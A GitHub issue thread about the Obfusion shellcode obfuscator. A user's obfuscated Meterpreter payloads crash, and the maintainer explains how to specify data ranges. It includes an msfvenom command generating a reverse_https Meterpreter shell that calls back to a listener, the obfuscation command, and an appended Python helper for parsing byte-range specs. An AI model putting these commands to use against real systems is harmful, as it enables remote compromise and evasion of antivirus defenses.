
Can't generate working shellcode #8

Open
vysecurity opened this issue Jul 8, 2016 · 9 comments

Comments

@vysecurity

So all of the generated shell code seems to be broken...

I can't generate working shell code that does not crash.

@kgretzky
Owner

kgretzky commented Jul 8, 2016

Can you send me one of the shellcodes that you are trying to obfuscate?
They may have some hardcoded offsets that make obfuscation impossible.

You can send it in binary form and I will disassemble it myself.
On 8 Jul 2016 16:05, "Vincent Yiu" [email protected] wrote:

So all of the generated shell code seems to be broken...

I can't generate working shell code that does not crash.


@vysecurity
Author

Email? :)

@vysecurity
Author

Actually, I just did:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.58.128 LPORT=443 -f raw -o /root/sc.bin

python x86_obf.py -i /root/sc.bin -o /root/sc2.bin -r0-184

@vysecurity
Author

sc.bin injects fine and calls back. sc2.bin crashes.

@kgretzky
Owner

kgretzky commented Jul 8, 2016

Ah sure :)

kuba -at- breakdev.org
On 8 Jul 2016 16:27, "Vincent Yiu" [email protected] wrote:

Email? :)


@kgretzky
Owner

kgretzky commented Jul 8, 2016

Can you send me the sc.bin file? I don't have the metasploit environment around me currently.
I will take a look at it and let you know what's up.

@vysecurity
Author

Sent Email.

@kgretzky
Owner

Thanks, got it!
I took a look and it seems the reverse_https has a lot of static data (of variable length at every generation, unfortunately), so before obfuscating the generated shellcode you need to specify the proper data ranges, so that the obfuscator knows which parts of the shellcode are not code up for obfuscation.

Take a look: http://i.imgur.com/lN7W7t3.png
I highlighted the largest data block in the middle, and there is also a data block in the end with the IP address string. You need to view each generated shellcode and manually figure out the data ranges.

In your situation, for this specific sc.bin file, the argument for specifying code ranges would look like this:
-r0-184,329-465,481-490

For now I'd advise using the reverse_tcp payload as it doesn't have any static data blocks. I will be working on a Metasploit generator tool using the Obfusion library that will simplify the process of generating obfuscated shellcodes.
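The range argument above lists the byte offsets that are code; everything outside those ranges is left unchanged, which is also the set of bytes that stays constant across every obfuscated copy (the address string at the end, for instance). The Python helper below is an added example, not part of Obfusion or of this thread. It parses a spec in the same `a-b,c-d` form, rejects malformed or overlapping ranges, and reports which regions of a blob fall outside the spec. It assumes inclusive end offsets (as `0-184` suggests) and uses a constructed 512-byte stand-in for sc.bin, since the real file's length is not given in the thread.

```python
"""Parse an Obfusion-style code-range spec (e.g. "0-184,329-465,481-490")
and report which byte regions of a blob fall outside it.

Assumption (not confirmed by the thread): range ends are inclusive, so
"0-184" covers bytes 0 through 184.
"""
from typing import List, Tuple

Range = Tuple[int, int]


def parse_ranges(spec: str) -> List[Range]:
    """Parse "a-b,c-d,..." into sorted, non-overlapping (start, end) pairs."""
    ranges: List[Range] = []
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        start_s, sep, end_s = part.partition("-")
        if not sep or not start_s.isdigit() or not end_s.isdigit():
            raise ValueError(f"malformed range {part!r}, expected start-end")
        start, end = int(start_s), int(end_s)
        if end < start:
            raise ValueError(f"range {part!r} ends before it starts")
        ranges.append((start, end))
    ranges.sort()
    # Overlapping ranges are almost certainly a typo; refuse them.
    for (s1, e1), (s2, e2) in zip(ranges, ranges[1:]):
        if s2 <= e1:
            raise ValueError(f"ranges {s1}-{e1} and {s2}-{e2} overlap")
    return ranges


def uncovered_regions(ranges: List[Range], length: int) -> List[Range]:
    """Return the (start, end) regions of a blob of `length` bytes that are
    not inside any range, i.e. the parts treated as data and left as-is."""
    if ranges and ranges[-1][1] >= length:
        raise ValueError(f"range {ranges[-1]} exceeds blob length {length}")
    gaps: List[Range] = []
    cursor = 0
    for start, end in ranges:
        if start > cursor:
            gaps.append((cursor, start - 1))
        cursor = end + 1
    if cursor < length:
        gaps.append((cursor, length - 1))
    return gaps


def untouched_bytes(blob: bytes, spec: str) -> List[Tuple[int, bytes]]:
    """Slice out every region the spec leaves unchanged, tagged with its offset."""
    gaps = uncovered_regions(parse_ranges(spec), len(blob))
    return [(start, blob[start:end + 1]) for start, end in gaps]


# Constructed stand-in for sc.bin: 512 bytes of filler with a NUL-terminated
# address string placed near the end, mirroring the data block the thread
# describes. The real sc.bin length is not given in the thread.
_buf = bytearray(b"\x90" * 512)
_buf[491:491 + 15] = b"192.168.58.128\x00"
SAMPLE_BLOB = bytes(_buf)
SAMPLE_SPEC = "0-184,329-465,481-490"

if __name__ == "__main__":
    for offset, chunk in untouched_bytes(SAMPLE_BLOB, SAMPLE_SPEC):
        print(f"offset {offset:4d}: {len(chunk):3d} bytes left as data")
```

Run against the constructed blob, the spec leaves three regions untouched: bytes 185-328, 466-480 and 491-511, the last of which carries the address string. Comparing the reported gaps with a disassembly listing is a quick sanity check that a hand-written spec does not accidentally mark a data block as code, which is the failure mode behind the crash reported in this issue.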

@vysecurity
Author

Thanks. I think I get it. I'll go into some more work with this :)
